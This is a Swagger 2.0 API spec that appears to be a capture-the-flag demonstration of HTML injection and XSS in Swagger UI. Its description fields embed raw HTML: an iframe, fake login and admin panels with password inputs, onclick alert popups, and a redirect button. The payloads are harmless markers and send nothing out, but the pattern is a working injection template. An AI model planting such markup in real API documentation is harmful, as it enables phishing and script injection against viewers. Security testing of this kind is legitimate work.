swagger: "2.0"
info:
  title: |
    🔥 CTF HTML INJECTION DEMO
  version: "1.0"
  description: |
    <h1 style="color:#c00">CTF DEMO – Swagger UI Vulnerable</h1>

    <iframe width="100%" height="315"
      src="https://www.youtube.com/embed/rscOXVuaCGw"
      frameborder="0"
      allowfullscreen>
    </iframe>

    <hr>

    <div style="display:flex;gap:20px;flex-wrap:wrap">

      <!-- PANEL FAKE 1 -->
      <div style="border:2px dashed red;padding:20px;width:300px">
        <h3>⚠️ Fake Login Panel (CTF)</h3>
        <input placeholder="Usuario (demo)" style="width:100%;margin-bottom:10px">
        <input placeholder="Contraseña (demo)" type="password" style="width:100%;margin-bottom:10px">
        <button onclick="alert('CTF DEMO POPUP')">
          Demo Popup
        </button>
        <br><br>
        <a href="https://youtu.be/rscOXVuaCGw" target="_blank">
          Ir al video
        </a>
      </div>

      <!-- PANEL FAKE 2 -->
      <div style="border:2px dashed blue;padding:20px;width:300px">
        <h3>⚠️ Fake Admin Panel (CTF)</h3>
        <button onclick="window.location.href='https://youtu.be/rscOXVuaCGw'">
          Redirect Demo
        </button>
      </div>

    </div>

paths:
  /demo:
    get:
      summary: HTML Injection Proof
      description: |
        <button onclick="alert('XSS / HTML Injection Confirmed')">
          Click me (CTF)
        </button>
      responses:
        '200':
          description: Injection successful
